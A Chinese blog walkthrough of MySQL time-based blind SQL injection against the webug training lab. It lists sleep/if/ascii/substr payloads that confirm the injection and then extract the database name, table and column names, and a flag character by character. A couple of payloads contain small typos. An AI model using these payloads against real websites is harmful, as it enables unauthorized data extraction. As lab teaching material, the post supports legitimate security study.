MySQL延时盲注

46 篇文章 24 订阅
22 篇文章 1 订阅

Mysqlzhuru—延时盲注

webug靶场—延时注入

1、延时注入定义

基于时间盲注的原理分析,注入SQL语句执行后不提示真假,也不能通过页面内容来进行判断,通过构造SQL语句注入,查看页面响应的时间来判断信息为时间盲注。
延时注入的原理就是,所要爆的信息的ascii码正确时,产生延时,否则不延时

2、延时注入的函数

sleep()              //延迟函数
sleep(5)			 //延时五秒注入

if(true,false)       //条件语句
if (condition,a,b)   //如果condition成立,返回a,否则返回b

ascii()              //转换成ascii码
substring            //取出字符串里的值

mid(a,b,c)   		 //从位置b开始,截取a字符串的c位
substr(a,b,c) 		 //从b位置开始,截取字符串a的c长度

if (condition,a,b)如果condition成立,返回a,否则返回b

image-20211030150950241

and sleep(5)延时五秒注入

image-20211030150831156

两者结合

image-20211030151119609

通过延迟时间判断条件是否成立

延时判断受网站打开速度或网络质量影响

3、判断注入

出现延迟,说明存在注入

1' and sleep(5)%23

4、判断数据库字符长度

1' and if(length(database())=5,sleep(3),1)%23

5、爆破数据库名

1' and if(ascii(substr(database(),1,1))=119,sleep(3),1)%23

1' and if(ascii(substr(database(),2,1))=101,sleep(3),1)%23

······

数据库:webug

6、判断当前数据库表数量

1' and if((select count(*) from information_schema.tables where table_schema=database())=7,sleep(3),1))

7、判断表长度

#判断第一张表,表名的长度

1' and if((select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=9,sleep(3),1)%23

#判断第二张表,表名的长度

1' and if((select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)=8,sleep(3),1)%23

#判断第三张表,表名的长度

······

8、爆破表名

#爆破第一张表表名

#爆破第一个字符的ascii码

1'and if(ascii(substr((select table_name from information_schema.tables where table_schema='webug' limit 0,1),1,1))=100,sleep(3),1)%23

#爆破第二个字符的ascii码

1'and if(ascii(substr((select table_name from information_schema.tables where table_schema='webug' limit 0,1),2,1))=97,sleep(3),1)%23

#爆破第二张表表名

#第一个字符的ascii码值

1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=101,sleep(3),1)%23

#第二个字符的ascii码值

1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=110,sleep(3),1)%23

#第三个字符的ascii码值

······

9、猜解列

#猜解表有多少个字段

1' and if((select count(column_name) from information_schema.columns where table_name='env_list')=8,sleep(3),1)%23

#猜解表的第一个列名字符长度

1' and if((select length(column_name) from information_schema.columns where table_name='env_list' limit 0,1)=2,sleep(3),1)%23

#猜解表的第二个列名字符长度

······

#爆破第五个列名,第一个字符的ascii

1' and if(ascii(substr((select column_n**ame from information_schema.columns where table_name='env_list' limit 5,1),1,1))=101,sleep(3),1)%23

#爆破第五个列名,第二个字符的ascii

10、读取数据

#猜解envFlag字段有多少条记录

1' and if((select count(envFlag) from env_list)=20,sleep(3),1)%23

#猜解envFlag字段第三条字段有多少个字符(flag在第三条记录)

1' and if((select length(envFlag) from env_list limit 2,1)=9,sleep(3),1)%23

#猜解flag

1' and if(ascii(substr((select envFlag from env_list limit 2,1),1,1))=103,sleep(3),1)%23

1' and if(ascii(substr((select envFlag from env_list limit 2,1),2,1))=102,sleep(3),1)%23

······

#最后flag的ASCII码值为:

103 102 100 103 100 102 115 100 103

#解码:

gfdgdfsdg

  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Shadow丶S

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值